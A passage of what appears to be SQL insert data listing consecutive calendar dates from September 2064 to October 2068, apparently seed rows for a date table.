('2064-09-06'),
('2064-09-07'),
('2064-09-08'),
('2064-09-09'),
('2064-09-10'),
('2064-09-11'),
('2064-09-12'),
('2064-09-13'),
('2064-09-14'),
('2064-09-15'),
('2064-09-16'),
('2064-09-17'),
('2064-09-18'),
('2064-09-19'),
('2064-09-20'),
('2064-09-21'),
('2064-09-22'),
('2064-09-23'),
('2064-09-24'),
('2064-09-25'),
('2064-09-26'),
('2064-09-27'),
('2064-09-28'),
('2064-09-29'),
('2064-09-30'),
('2064-10-01'),
('2064-10-02'),
('2064-10-03'),
('2064-10-04'),
('2064-10-05'),
('2064-10-06'),
('2064-10-07'),
('2064-10-08'),
('2064-10-09'),
('2064-10-10'),
('2064-10-11'),
('2064-10-12'),
('2064-10-13'),
('2064-10-14'),
('2064-10-15'),
('2064-10-16'),
('2064-10-17'),
('2064-10-18'),
('2064-10-19'),
('2064-10-20'),
('2064-10-21'),
('2064-10-22'),
('2064-10-23'),
('2064-10-24'),
('2064-10-25'),
('2064-10-26'),
('2064-10-27'),
('2064-10-28'),
('2064-10-29'),
('2064-10-30'),
('2064-10-31'),
('2064-11-01'),
('2064-11-02'),
('2064-11-03'),
('2064-11-04'),
('2064-11-05'),
('2064-11-06'),
('2064-11-07'),
('2064-11-08'),
('2064-11-09'),
('2064-11-10'),
('2064-11-11'),
('2064-11-12'),
('2064-11-13'),
('2064-11-14'),
('2064-11-15'),
('2064-11-16'),
('2064-11-17'),
('2064-11-18'),
('2064-11-19'),
('2064-11-20'),
('2064-11-21'),
('2064-11-22'),
('2064-11-23'),
('2064-11-24'),
('2064-11-25'),
('2064-11-26'),
('2064-11-27'),
('2064-11-28'),
('2064-11-29'),
('2064-11-30'),
('2064-12-01'),
('2064-12-02'),
('2064-12-03'),
('2064-12-04'),
('2064-12-05'),
('2064-12-06'),
('2064-12-07'),
('2064-12-08'),
('2064-12-09'),
('2064-12-10'),
('2064-12-11'),
('2064-12-12'),
('2064-12-13'),
('2064-12-14'),
('2064-12-15'),
('2064-12-16'),
('2064-12-17'),
('2064-12-18'),
('2064-12-19'),
('2064-12-20'),
('2064-12-21'),
('2064-12-22'),
('2064-12-23'),
('2064-12-24'),
('2064-12-25'),
('2064-12-26'),
('2064-12-27'),
('2064-12-28'),
('2064-12-29'),
('2064-12-30'),
('2064-12-31'),
('2065-01-01'),
('2065-01-02'),
('2065-01-03'),
('2065-01-04'),
('2065-01-05'),
('2065-01-06'),
('2065-01-07'),
('2065-01-08'),
('2065-01-09'),
('2065-01-10'),
('2065-01-11'),
('2065-01-12'),
('2065-01-13'),
('2065-01-14'),
('2065-01-15'),
('2065-01-16'),
('2065-01-17'),
('2065-01-18'),
('2065-01-19'),
('2065-01-20'),
('2065-01-21'),
('2065-01-22'),
('2065-01-23'),
('2065-01-24'),
('2065-01-25'),
('2065-01-26'),
('2065-01-27'),
('2065-01-28'),
('2065-01-29'),
('2065-01-30'),
('2065-01-31'),
('2065-02-01'),
('2065-02-02'),
('2065-02-03'),
('2065-02-04'),
('2065-02-05'),
('2065-02-06'),
('2065-02-07'),
('2065-02-08'),
('2065-02-09'),
('2065-02-10'),
('2065-02-11'),
('2065-02-12'),
('2065-02-13'),
('2065-02-14'),
('2065-02-15'),
('2065-02-16'),
('2065-02-17'),
('2065-02-18'),
('2065-02-19'),
('2065-02-20'),
('2065-02-21'),
('2065-02-22'),
('2065-02-23'),
('2065-02-24'),
('2065-02-25'),
('2065-02-26'),
('2065-02-27'),
('2065-02-28'),
('2065-03-01'),
('2065-03-02'),
('2065-03-03'),
('2065-03-04'),
('2065-03-05'),
('2065-03-06'),
('2065-03-07'),
('2065-03-08'),
('2065-03-09'),
('2065-03-10'),
('2065-03-11'),
('2065-03-12'),
('2065-03-13'),
('2065-03-14'),
('2065-03-15'),
('2065-03-16'),
('2065-03-17'),
('2065-03-18'),
('2065-03-19'),
('2065-03-20'),
('2065-03-21'),
('2065-03-22'),
('2065-03-23'),
('2065-03-24'),
('2065-03-25'),
('2065-03-26'),
('2065-03-27'),
('2065-03-28'),
('2065-03-29'),
('2065-03-30'),
('2065-03-31'),
('2065-04-01'),
('2065-04-02'),
('2065-04-03'),
('2065-04-04'),
('2065-04-05'),
('2065-04-06'),
('2065-04-07'),
('2065-04-08'),
('2065-04-09'),
('2065-04-10'),
('2065-04-11'),
('2065-04-12'),
('2065-04-13'),
('2065-04-14'),
('2065-04-15'),
('2065-04-16'),
('2065-04-17'),
('2065-04-18'),
('2065-04-19'),
('2065-04-20'),
('2065-04-21'),
('2065-04-22'),
('2065-04-23'),
('2065-04-24'),
('2065-04-25'),
('2065-04-26'),
('2065-04-27'),
('2065-04-28'),
('2065-04-29'),
('2065-04-30'),
('2065-05-01'),
('2065-05-02'),
('2065-05-03'),
('2065-05-04'),
('2065-05-05'),
('2065-05-06'),
('2065-05-07'),
('2065-05-08'),
('2065-05-09'),
('2065-05-10'),
('2065-05-11'),
('2065-05-12'),
('2065-05-13'),
('2065-05-14'),
('2065-05-15'),
('2065-05-16'),
('2065-05-17'),
('2065-05-18'),
('2065-05-19'),
('2065-05-20'),
('2065-05-21'),
('2065-05-22'),
('2065-05-23'),
('2065-05-24'),
('2065-05-25'),
('2065-05-26'),
('2065-05-27'),
('2065-05-28'),
('2065-05-29'),
('2065-05-30'),
('2065-05-31'),
('2065-06-01'),
('2065-06-02'),
('2065-06-03'),
('2065-06-04'),
('2065-06-05'),
('2065-06-06'),
('2065-06-07'),
('2065-06-08'),
('2065-06-09'),
('2065-06-10'),
('2065-06-11'),
('2065-06-12'),
('2065-06-13'),
('2065-06-14'),
('2065-06-15'),
('2065-06-16'),
('2065-06-17'),
('2065-06-18'),
('2065-06-19'),
('2065-06-20'),
('2065-06-21'),
('2065-06-22'),
('2065-06-23'),
('2065-06-24'),
('2065-06-25'),
('2065-06-26'),
('2065-06-27'),
('2065-06-28'),
('2065-06-29'),
('2065-06-30'),
('2065-07-01'),
('2065-07-02'),
('2065-07-03'),
('2065-07-04'),
('2065-07-05'),
('2065-07-06'),
('2065-07-07'),
('2065-07-08'),
('2065-07-09'),
('2065-07-10'),
('2065-07-11'),
('2065-07-12'),
('2065-07-13'),
('2065-07-14'),
('2065-07-15'),
('2065-07-16'),
('2065-07-17'),
('2065-07-18'),
('2065-07-19'),
('2065-07-20'),
('2065-07-21'),
('2065-07-22'),
('2065-07-23'),
('2065-07-24'),
('2065-07-25'),
('2065-07-26'),
('2065-07-27'),
('2065-07-28'),
('2065-07-29'),
('2065-07-30'),
('2065-07-31'),
('2065-08-01'),
('2065-08-02'),
('2065-08-03'),
('2065-08-04'),
('2065-08-05'),
('2065-08-06'),
('2065-08-07'),
('2065-08-08'),
('2065-08-09'),
('2065-08-10'),
('2065-08-11'),
('2065-08-12'),
('2065-08-13'),
('2065-08-14'),
('2065-08-15'),
('2065-08-16'),
('2065-08-17'),
('2065-08-18'),
('2065-08-19'),
('2065-08-20'),
('2065-08-21'),
('2065-08-22'),
('2065-08-23'),
('2065-08-24'),
('2065-08-25'),
('2065-08-26'),
('2065-08-27'),
('2065-08-28'),
('2065-08-29'),
('2065-08-30'),
('2065-08-31'),
('2065-09-01'),
('2065-09-02'),
('2065-09-03'),
('2065-09-04'),
('2065-09-05'),
('2065-09-06'),
('2065-09-07'),
('2065-09-08'),
('2065-09-09'),
('2065-09-10'),
('2065-09-11'),
('2065-09-12'),
('2065-09-13'),
('2065-09-14'),
('2065-09-15'),
('2065-09-16'),
('2065-09-17'),
('2065-09-18'),
('2065-09-19'),
('2065-09-20'),
('2065-09-21'),
('2065-09-22'),
('2065-09-23'),
('2065-09-24'),
('2065-09-25'),
('2065-09-26'),
('2065-09-27'),
('2065-09-28'),
('2065-09-29'),
('2065-09-30'),
('2065-10-01'),
('2065-10-02'),
('2065-10-03'),
('2065-10-04'),
('2065-10-05'),
('2065-10-06'),
('2065-10-07'),
('2065-10-08'),
('2065-10-09'),
('2065-10-10'),
('2065-10-11'),
('2065-10-12'),
('2065-10-13'),
('2065-10-14'),
('2065-10-15'),
('2065-10-16'),
('2065-10-17'),
('2065-10-18'),
('2065-10-19'),
('2065-10-20'),
('2065-10-21'),
('2065-10-22'),
('2065-10-23'),
('2065-10-24'),
('2065-10-25'),
('2065-10-26'),
('2065-10-27'),
('2065-10-28'),
('2065-10-29'),
('2065-10-30'),
('2065-10-31'),
('2065-11-01'),
('2065-11-02'),
('2065-11-03'),
('2065-11-04'),
('2065-11-05'),
('2065-11-06'),
('2065-11-07'),
('2065-11-08'),
('2065-11-09'),
('2065-11-10'),
('2065-11-11'),
('2065-11-12'),
('2065-11-13'),
('2065-11-14'),
('2065-11-15'),
('2065-11-16'),
('2065-11-17'),
('2065-11-18'),
('2065-11-19'),
('2065-11-20'),
('2065-11-21'),
('2065-11-22'),
('2065-11-23'),
('2065-11-24'),
('2065-11-25'),
('2065-11-26'),
('2065-11-27'),
('2065-11-28'),
('2065-11-29'),
('2065-11-30'),
('2065-12-01'),
('2065-12-02'),
('2065-12-03'),
('2065-12-04'),
('2065-12-05'),
('2065-12-06'),
('2065-12-07'),
('2065-12-08'),
('2065-12-09'),
('2065-12-10'),
('2065-12-11'),
('2065-12-12'),
('2065-12-13'),
('2065-12-14'),
('2065-12-15'),
('2065-12-16'),
('2065-12-17'),
('2065-12-18'),
('2065-12-19'),
('2065-12-20'),
('2065-12-21'),
('2065-12-22'),
('2065-12-23'),
('2065-12-24'),
('2065-12-25'),
('2065-12-26'),
('2065-12-27'),
('2065-12-28'),
('2065-12-29'),
('2065-12-30'),
('2065-12-31'),
('2066-01-01'),
('2066-01-02'),
('2066-01-03'),
('2066-01-04'),
('2066-01-05'),
('2066-01-06'),
('2066-01-07'),
('2066-01-08'),
('2066-01-09'),
('2066-01-10'),
('2066-01-11'),
('2066-01-12'),
('2066-01-13'),
('2066-01-14'),
('2066-01-15'),
('2066-01-16'),
('2066-01-17'),
('2066-01-18'),
('2066-01-19'),
('2066-01-20'),
('2066-01-21'),
('2066-01-22'),
('2066-01-23'),
('2066-01-24'),
('2066-01-25'),
('2066-01-26'),
('2066-01-27'),
('2066-01-28'),
('2066-01-29'),
('2066-01-30'),
('2066-01-31'),
('2066-02-01'),
('2066-02-02'),
('2066-02-03'),
('2066-02-04'),
('2066-02-05'),
('2066-02-06'),
('2066-02-07'),
('2066-02-08'),
('2066-02-09'),
('2066-02-10'),
('2066-02-11'),
('2066-02-12'),
('2066-02-13'),
('2066-02-14'),
('2066-02-15'),
('2066-02-16'),
('2066-02-17'),
('2066-02-18'),
('2066-02-19'),
('2066-02-20'),
('2066-02-21'),
('2066-02-22'),
('2066-02-23'),
('2066-02-24'),
('2066-02-25'),
('2066-02-26'),
('2066-02-27'),
('2066-02-28'),
('2066-03-01'),
('2066-03-02'),
('2066-03-03'),
('2066-03-04'),
('2066-03-05'),
('2066-03-06'),
('2066-03-07'),
('2066-03-08'),
('2066-03-09'),
('2066-03-10'),
('2066-03-11'),
('2066-03-12'),
('2066-03-13'),
('2066-03-14'),
('2066-03-15'),
('2066-03-16'),
('2066-03-17'),
('2066-03-18'),
('2066-03-19'),
('2066-03-20'),
('2066-03-21'),
('2066-03-22'),
('2066-03-23'),
('2066-03-24'),
('2066-03-25'),
('2066-03-26'),
('2066-03-27'),
('2066-03-28'),
('2066-03-29'),
('2066-03-30'),
('2066-03-31'),
('2066-04-01'),
('2066-04-02'),
('2066-04-03'),
('2066-04-04'),
('2066-04-05'),
('2066-04-06'),
('2066-04-07'),
('2066-04-08'),
('2066-04-09'),
('2066-04-10'),
('2066-04-11'),
('2066-04-12'),
('2066-04-13'),
('2066-04-14'),
('2066-04-15'),
('2066-04-16'),
('2066-04-17'),
('2066-04-18'),
('2066-04-19'),
('2066-04-20'),
('2066-04-21'),
('2066-04-22'),
('2066-04-23'),
('2066-04-24'),
('2066-04-25'),
('2066-04-26'),
('2066-04-27'),
('2066-04-28'),
('2066-04-29'),
('2066-04-30'),
('2066-05-01'),
('2066-05-02'),
('2066-05-03'),
('2066-05-04'),
('2066-05-05'),
('2066-05-06'),
('2066-05-07'),
('2066-05-08'),
('2066-05-09'),
('2066-05-10'),
('2066-05-11'),
('2066-05-12'),
('2066-05-13'),
('2066-05-14'),
('2066-05-15'),
('2066-05-16'),
('2066-05-17'),
('2066-05-18'),
('2066-05-19'),
('2066-05-20'),
('2066-05-21'),
('2066-05-22'),
('2066-05-23'),
('2066-05-24'),
('2066-05-25'),
('2066-05-26'),
('2066-05-27'),
('2066-05-28'),
('2066-05-29'),
('2066-05-30'),
('2066-05-31'),
('2066-06-01'),
('2066-06-02'),
('2066-06-03'),
('2066-06-04'),
('2066-06-05'),
('2066-06-06'),
('2066-06-07'),
('2066-06-08'),
('2066-06-09'),
('2066-06-10'),
('2066-06-11'),
('2066-06-12'),
('2066-06-13'),
('2066-06-14'),
('2066-06-15'),
('2066-06-16'),
('2066-06-17'),
('2066-06-18'),
('2066-06-19'),
('2066-06-20'),
('2066-06-21'),
('2066-06-22'),
('2066-06-23'),
('2066-06-24'),
('2066-06-25'),
('2066-06-26'),
('2066-06-27'),
('2066-06-28'),
('2066-06-29'),
('2066-06-30'),
('2066-07-01'),
('2066-07-02'),
('2066-07-03'),
('2066-07-04'),
('2066-07-05'),
('2066-07-06'),
('2066-07-07'),
('2066-07-08'),
('2066-07-09'),
('2066-07-10'),
('2066-07-11'),
('2066-07-12'),
('2066-07-13'),
('2066-07-14'),
('2066-07-15'),
('2066-07-16'),
('2066-07-17'),
('2066-07-18'),
('2066-07-19'),
('2066-07-20'),
('2066-07-21'),
('2066-07-22'),
('2066-07-23'),
('2066-07-24'),
('2066-07-25'),
('2066-07-26'),
('2066-07-27'),
('2066-07-28'),
('2066-07-29'),
('2066-07-30'),
('2066-07-31'),
('2066-08-01'),
('2066-08-02'),
('2066-08-03'),
('2066-08-04'),
('2066-08-05'),
('2066-08-06'),
('2066-08-07'),
('2066-08-08'),
('2066-08-09'),
('2066-08-10'),
('2066-08-11'),
('2066-08-12'),
('2066-08-13'),
('2066-08-14'),
('2066-08-15'),
('2066-08-16'),
('2066-08-17'),
('2066-08-18'),
('2066-08-19'),
('2066-08-20'),
('2066-08-21'),
('2066-08-22'),
('2066-08-23'),
('2066-08-24'),
('2066-08-25'),
('2066-08-26'),
('2066-08-27'),
('2066-08-28'),
('2066-08-29'),
('2066-08-30'),
('2066-08-31'),
('2066-09-01'),
('2066-09-02'),
('2066-09-03'),
('2066-09-04'),
('2066-09-05'),
('2066-09-06'),
('2066-09-07'),
('2066-09-08'),
('2066-09-09'),
('2066-09-10'),
('2066-09-11'),
('2066-09-12'),
('2066-09-13'),
('2066-09-14'),
('2066-09-15'),
('2066-09-16'),
('2066-09-17'),
('2066-09-18'),
('2066-09-19'),
('2066-09-20'),
('2066-09-21'),
('2066-09-22'),
('2066-09-23'),
('2066-09-24'),
('2066-09-25'),
('2066-09-26'),
('2066-09-27'),
('2066-09-28'),
('2066-09-29'),
('2066-09-30'),
('2066-10-01'),
('2066-10-02'),
('2066-10-03'),
('2066-10-04'),
('2066-10-05'),
('2066-10-06'),
('2066-10-07'),
('2066-10-08'),
('2066-10-09'),
('2066-10-10'),
('2066-10-11'),
('2066-10-12'),
('2066-10-13'),
('2066-10-14'),
('2066-10-15'),
('2066-10-16'),
('2066-10-17'),
('2066-10-18'),
('2066-10-19'),
('2066-10-20'),
('2066-10-21'),
('2066-10-22'),
('2066-10-23'),
('2066-10-24'),
('2066-10-25'),
('2066-10-26'),
('2066-10-27'),
('2066-10-28'),
('2066-10-29'),
('2066-10-30'),
('2066-10-31'),
('2066-11-01'),
('2066-11-02'),
('2066-11-03'),
('2066-11-04'),
('2066-11-05'),
('2066-11-06'),
('2066-11-07'),
('2066-11-08'),
('2066-11-09'),
('2066-11-10'),
('2066-11-11'),
('2066-11-12'),
('2066-11-13'),
('2066-11-14'),
('2066-11-15'),
('2066-11-16'),
('2066-11-17'),
('2066-11-18'),
('2066-11-19'),
('2066-11-20'),
('2066-11-21'),
('2066-11-22'),
('2066-11-23'),
('2066-11-24'),
('2066-11-25'),
('2066-11-26'),
('2066-11-27'),
('2066-11-28'),
('2066-11-29'),
('2066-11-30'),
('2066-12-01'),
('2066-12-02'),
('2066-12-03'),
('2066-12-04'),
('2066-12-05'),
('2066-12-06'),
('2066-12-07'),
('2066-12-08'),
('2066-12-09'),
('2066-12-10'),
('2066-12-11'),
('2066-12-12'),
('2066-12-13'),
('2066-12-14'),
('2066-12-15'),
('2066-12-16'),
('2066-12-17'),
('2066-12-18'),
('2066-12-19'),
('2066-12-20'),
('2066-12-21'),
('2066-12-22'),
('2066-12-23'),
('2066-12-24'),
('2066-12-25'),
('2066-12-26'),
('2066-12-27'),
('2066-12-28'),
('2066-12-29'),
('2066-12-30'),
('2066-12-31'),
('2067-01-01'),
('2067-01-02'),
('2067-01-03'),
('2067-01-04'),
('2067-01-05'),
('2067-01-06'),
('2067-01-07'),
('2067-01-08'),
('2067-01-09'),
('2067-01-10'),
('2067-01-11'),
('2067-01-12'),
('2067-01-13'),
('2067-01-14'),
('2067-01-15'),
('2067-01-16'),
('2067-01-17'),
('2067-01-18'),
('2067-01-19'),
('2067-01-20'),
('2067-01-21'),
('2067-01-22'),
('2067-01-23'),
('2067-01-24'),
('2067-01-25'),
('2067-01-26'),
('2067-01-27'),
('2067-01-28'),
('2067-01-29'),
('2067-01-30'),
('2067-01-31'),
('2067-02-01'),
('2067-02-02'),
('2067-02-03'),
('2067-02-04'),
('2067-02-05'),
('2067-02-06'),
('2067-02-07'),
('2067-02-08'),
('2067-02-09'),
('2067-02-10'),
('2067-02-11'),
('2067-02-12'),
('2067-02-13'),
('2067-02-14'),
('2067-02-15'),
('2067-02-16'),
('2067-02-17'),
('2067-02-18'),
('2067-02-19'),
('2067-02-20'),
('2067-02-21'),
('2067-02-22'),
('2067-02-23'),
('2067-02-24'),
('2067-02-25'),
('2067-02-26'),
('2067-02-27'),
('2067-02-28'),
('2067-03-01'),
('2067-03-02'),
('2067-03-03'),
('2067-03-04'),
('2067-03-05'),
('2067-03-06'),
('2067-03-07'),
('2067-03-08'),
('2067-03-09'),
('2067-03-10'),
('2067-03-11'),
('2067-03-12'),
('2067-03-13'),
('2067-03-14'),
('2067-03-15'),
('2067-03-16'),
('2067-03-17'),
('2067-03-18'),
('2067-03-19'),
('2067-03-20'),
('2067-03-21'),
('2067-03-22'),
('2067-03-23'),
('2067-03-24'),
('2067-03-25'),
('2067-03-26'),
('2067-03-27'),
('2067-03-28'),
('2067-03-29'),
('2067-03-30'),
('2067-03-31'),
('2067-04-01'),
('2067-04-02'),
('2067-04-03'),
('2067-04-04'),
('2067-04-05'),
('2067-04-06'),
('2067-04-07'),
('2067-04-08'),
('2067-04-09'),
('2067-04-10'),
('2067-04-11'),
('2067-04-12'),
('2067-04-13'),
('2067-04-14'),
('2067-04-15'),
('2067-04-16'),
('2067-04-17'),
('2067-04-18'),
('2067-04-19'),
('2067-04-20'),
('2067-04-21'),
('2067-04-22'),
('2067-04-23'),
('2067-04-24'),
('2067-04-25'),
('2067-04-26'),
('2067-04-27'),
('2067-04-28'),
('2067-04-29'),
('2067-04-30'),
('2067-05-01'),
('2067-05-02'),
('2067-05-03'),
('2067-05-04'),
('2067-05-05'),
('2067-05-06'),
('2067-05-07'),
('2067-05-08'),
('2067-05-09'),
('2067-05-10'),
('2067-05-11'),
('2067-05-12'),
('2067-05-13'),
('2067-05-14'),
('2067-05-15'),
('2067-05-16'),
('2067-05-17'),
('2067-05-18'),
('2067-05-19'),
('2067-05-20'),
('2067-05-21'),
('2067-05-22'),
('2067-05-23'),
('2067-05-24'),
('2067-05-25'),
('2067-05-26'),
('2067-05-27'),
('2067-05-28'),
('2067-05-29'),
('2067-05-30'),
('2067-05-31'),
('2067-06-01'),
('2067-06-02'),
('2067-06-03'),
('2067-06-04'),
('2067-06-05'),
('2067-06-06'),
('2067-06-07'),
('2067-06-08'),
('2067-06-09'),
('2067-06-10'),
('2067-06-11'),
('2067-06-12'),
('2067-06-13'),
('2067-06-14'),
('2067-06-15'),
('2067-06-16'),
('2067-06-17'),
('2067-06-18'),
('2067-06-19'),
('2067-06-20'),
('2067-06-21'),
('2067-06-22'),
('2067-06-23'),
('2067-06-24'),
('2067-06-25'),
('2067-06-26'),
('2067-06-27'),
('2067-06-28'),
('2067-06-29'),
('2067-06-30'),
('2067-07-01'),
('2067-07-02'),
('2067-07-03'),
('2067-07-04'),
('2067-07-05'),
('2067-07-06'),
('2067-07-07'),
('2067-07-08'),
('2067-07-09'),
('2067-07-10'),
('2067-07-11'),
('2067-07-12'),
('2067-07-13'),
('2067-07-14'),
('2067-07-15'),
('2067-07-16'),
('2067-07-17'),
('2067-07-18'),
('2067-07-19'),
('2067-07-20'),
('2067-07-21'),
('2067-07-22'),
('2067-07-23'),
('2067-07-24'),
('2067-07-25'),
('2067-07-26'),
('2067-07-27'),
('2067-07-28'),
('2067-07-29'),
('2067-07-30'),
('2067-07-31'),
('2067-08-01'),
('2067-08-02'),
('2067-08-03'),
('2067-08-04'),
('2067-08-05'),
('2067-08-06'),
('2067-08-07'),
('2067-08-08'),
('2067-08-09'),
('2067-08-10'),
('2067-08-11'),
('2067-08-12'),
('2067-08-13'),
('2067-08-14'),
('2067-08-15'),
('2067-08-16'),
('2067-08-17'),
('2067-08-18'),
('2067-08-19'),
('2067-08-20'),
('2067-08-21'),
('2067-08-22'),
('2067-08-23'),
('2067-08-24'),
('2067-08-25'),
('2067-08-26'),
('2067-08-27'),
('2067-08-28'),
('2067-08-29'),
('2067-08-30'),
('2067-08-31'),
('2067-09-01'),
('2067-09-02'),
('2067-09-03'),
('2067-09-04'),
('2067-09-05'),
('2067-09-06'),
('2067-09-07'),
('2067-09-08'),
('2067-09-09'),
('2067-09-10'),
('2067-09-11'),
('2067-09-12'),
('2067-09-13'),
('2067-09-14'),
('2067-09-15'),
('2067-09-16'),
('2067-09-17'),
('2067-09-18'),
('2067-09-19'),
('2067-09-20'),
('2067-09-21'),
('2067-09-22'),
('2067-09-23'),
('2067-09-24'),
('2067-09-25'),
('2067-09-26'),
('2067-09-27'),
('2067-09-28'),
('2067-09-29'),
('2067-09-30'),
('2067-10-01'),
('2067-10-02'),
('2067-10-03'),
('2067-10-04'),
('2067-10-05'),
('2067-10-06'),
('2067-10-07'),
('2067-10-08'),
('2067-10-09'),
('2067-10-10'),
('2067-10-11'),
('2067-10-12'),
('2067-10-13'),
('2067-10-14'),
('2067-10-15'),
('2067-10-16'),
('2067-10-17'),
('2067-10-18'),
('2067-10-19'),
('2067-10-20'),
('2067-10-21'),
('2067-10-22'),
('2067-10-23'),
('2067-10-24'),
('2067-10-25'),
('2067-10-26'),
('2067-10-27'),
('2067-10-28'),
('2067-10-29'),
('2067-10-30'),
('2067-10-31'),
('2067-11-01'),
('2067-11-02'),
('2067-11-03'),
('2067-11-04'),
('2067-11-05'),
('2067-11-06'),
('2067-11-07'),
('2067-11-08'),
('2067-11-09'),
('2067-11-10'),
('2067-11-11'),
('2067-11-12'),
('2067-11-13'),
('2067-11-14'),
('2067-11-15'),
('2067-11-16'),
('2067-11-17'),
('2067-11-18'),
('2067-11-19'),
('2067-11-20'),
('2067-11-21'),
('2067-11-22'),
('2067-11-23'),
('2067-11-24'),
('2067-11-25'),
('2067-11-26'),
('2067-11-27'),
('2067-11-28'),
('2067-11-29'),
('2067-11-30'),
('2067-12-01'),
('2067-12-02'),
('2067-12-03'),
('2067-12-04'),
('2067-12-05'),
('2067-12-06'),
('2067-12-07'),
('2067-12-08'),
('2067-12-09'),
('2067-12-10'),
('2067-12-11'),
('2067-12-12'),
('2067-12-13'),
('2067-12-14'),
('2067-12-15'),
('2067-12-16'),
('2067-12-17'),
('2067-12-18'),
('2067-12-19'),
('2067-12-20'),
('2067-12-21'),
('2067-12-22'),
('2067-12-23'),
('2067-12-24'),
('2067-12-25'),
('2067-12-26'),
('2067-12-27'),
('2067-12-28'),
('2067-12-29'),
('2067-12-30'),
('2067-12-31'),
('2068-01-01'),
('2068-01-02'),
('2068-01-03'),
('2068-01-04'),
('2068-01-05'),
('2068-01-06'),
('2068-01-07'),
('2068-01-08'),
('2068-01-09'),
('2068-01-10'),
('2068-01-11'),
('2068-01-12'),
('2068-01-13'),
('2068-01-14'),
('2068-01-15'),
('2068-01-16'),
('2068-01-17'),
('2068-01-18'),
('2068-01-19'),
('2068-01-20'),
('2068-01-21'),
('2068-01-22'),
('2068-01-23'),
('2068-01-24'),
('2068-01-25'),
('2068-01-26'),
('2068-01-27'),
('2068-01-28'),
('2068-01-29'),
('2068-01-30'),
('2068-01-31'),
('2068-02-01'),
('2068-02-02'),
('2068-02-03'),
('2068-02-04'),
('2068-02-05'),
('2068-02-06'),
('2068-02-07'),
('2068-02-08'),
('2068-02-09'),
('2068-02-10'),
('2068-02-11'),
('2068-02-12'),
('2068-02-13'),
('2068-02-14'),
('2068-02-15'),
('2068-02-16'),
('2068-02-17'),
('2068-02-18'),
('2068-02-19'),
('2068-02-20'),
('2068-02-21'),
('2068-02-22'),
('2068-02-23'),
('2068-02-24'),
('2068-02-25'),
('2068-02-26'),
('2068-02-27'),
('2068-02-28'),
('2068-02-29'),
('2068-03-01'),
('2068-03-02'),
('2068-03-03'),
('2068-03-04'),
('2068-03-05'),
('2068-03-06'),
('2068-03-07'),
('2068-03-08'),
('2068-03-09'),
('2068-03-10'),
('2068-03-11'),
('2068-03-12'),
('2068-03-13'),
('2068-03-14'),
('2068-03-15'),
('2068-03-16'),
('2068-03-17'),
('2068-03-18'),
('2068-03-19'),
('2068-03-20'),
('2068-03-21'),
('2068-03-22'),
('2068-03-23'),
('2068-03-24'),
('2068-03-25'),
('2068-03-26'),
('2068-03-27'),
('2068-03-28'),
('2068-03-29'),
('2068-03-30'),
('2068-03-31'),
('2068-04-01'),
('2068-04-02'),
('2068-04-03'),
('2068-04-04'),
('2068-04-05'),
('2068-04-06'),
('2068-04-07'),
('2068-04-08'),
('2068-04-09'),
('2068-04-10'),
('2068-04-11'),
('2068-04-12'),
('2068-04-13'),
('2068-04-14'),
('2068-04-15'),
('2068-04-16'),
('2068-04-17'),
('2068-04-18'),
('2068-04-19'),
('2068-04-20'),
('2068-04-21'),
('2068-04-22'),
('2068-04-23'),
('2068-04-24'),
('2068-04-25'),
('2068-04-26'),
('2068-04-27'),
('2068-04-28'),
('2068-04-29'),
('2068-04-30'),
('2068-05-01'),
('2068-05-02'),
('2068-05-03'),
('2068-05-04'),
('2068-05-05'),
('2068-05-06'),
('2068-05-07'),
('2068-05-08'),
('2068-05-09'),
('2068-05-10'),
('2068-05-11'),
('2068-05-12'),
('2068-05-13'),
('2068-05-14'),
('2068-05-15'),
('2068-05-16'),
('2068-05-17'),
('2068-05-18'),
('2068-05-19'),
('2068-05-20'),
('2068-05-21'),
('2068-05-22'),
('2068-05-23'),
('2068-05-24'),
('2068-05-25'),
('2068-05-26'),
('2068-05-27'),
('2068-05-28'),
('2068-05-29'),
('2068-05-30'),
('2068-05-31'),
('2068-06-01'),
('2068-06-02'),
('2068-06-03'),
('2068-06-04'),
('2068-06-05'),
('2068-06-06'),
('2068-06-07'),
('2068-06-08'),
('2068-06-09'),
('2068-06-10'),
('2068-06-11'),
('2068-06-12'),
('2068-06-13'),
('2068-06-14'),
('2068-06-15'),
('2068-06-16'),
('2068-06-17'),
('2068-06-18'),
('2068-06-19'),
('2068-06-20'),
('2068-06-21'),
('2068-06-22'),
('2068-06-23'),
('2068-06-24'),
('2068-06-25'),
('2068-06-26'),
('2068-06-27'),
('2068-06-28'),
('2068-06-29'),
('2068-06-30'),
('2068-07-01'),
('2068-07-02'),
('2068-07-03'),
('2068-07-04'),
('2068-07-05'),
('2068-07-06'),
('2068-07-07'),
('2068-07-08'),
('2068-07-09'),
('2068-07-10'),
('2068-07-11'),
('2068-07-12'),
('2068-07-13'),
('2068-07-14'),
('2068-07-15'),
('2068-07-16'),
('2068-07-17'),
('2068-07-18'),
('2068-07-19'),
('2068-07-20'),
('2068-07-21'),
('2068-07-22'),
('2068-07-23'),
('2068-07-24'),
('2068-07-25'),
('2068-07-26'),
('2068-07-27'),
('2068-07-28'),
('2068-07-29'),
('2068-07-30'),
('2068-07-31'),
('2068-08-01'),
('2068-08-02'),
('2068-08-03'),
('2068-08-04'),
('2068-08-05'),
('2068-08-06'),
('2068-08-07'),
('2068-08-08'),
('2068-08-09'),
('2068-08-10'),
('2068-08-11'),
('2068-08-12'),
('2068-08-13'),
('2068-08-14'),
('2068-08-15'),
('2068-08-16'),
('2068-08-17'),
('2068-08-18'),
('2068-08-19'),
('2068-08-20'),
('2068-08-21'),
('2068-08-22'),
('2068-08-23'),
('2068-08-24'),
('2068-08-25'),
('2068-08-26'),
('2068-08-27'),
('2068-08-28'),
('2068-08-29'),
('2068-08-30'),
('2068-08-31'),
('2068-09-01'),
('2068-09-02'),
('2068-09-03'),
('2068-09-04'),
('2068-09-05'),
('2068-09-06'),
('2068-09-07'),
('2068-09-08'),
('2068-09-09'),
('2068-09-10'),
('2068-09-11'),
('2068-09-12'),
('2068-09-13'),
('2068-09-14'),
('2068-09-15'),
('2068-09-16'),
('2068-09-17'),
('2068-09-18'),
('2068-09-19'),
('2068-09-20'),
('2068-09-21'),
('2068-09-22'),
('2068-09-23'),
('2068-09-24'),
('2068-09-25'),
('2068-09-26'),
('2068-09-27'),
('2068-09-28'),
('2068-09-29'),
('2068-09-30'),
('2068-10-01'),
('2068-10-02'),
('2068-10-03'),
('2068-10-04'),
('2068-10-05'),
('2068-10-06'),
('2068-10-07'),
('2068-10-08'),
('2068-10-09'),
('2068-10-10'),
('2068-10-11'),
('2068-10-12'),
('2068-10-13'),
('2068-10-14'),
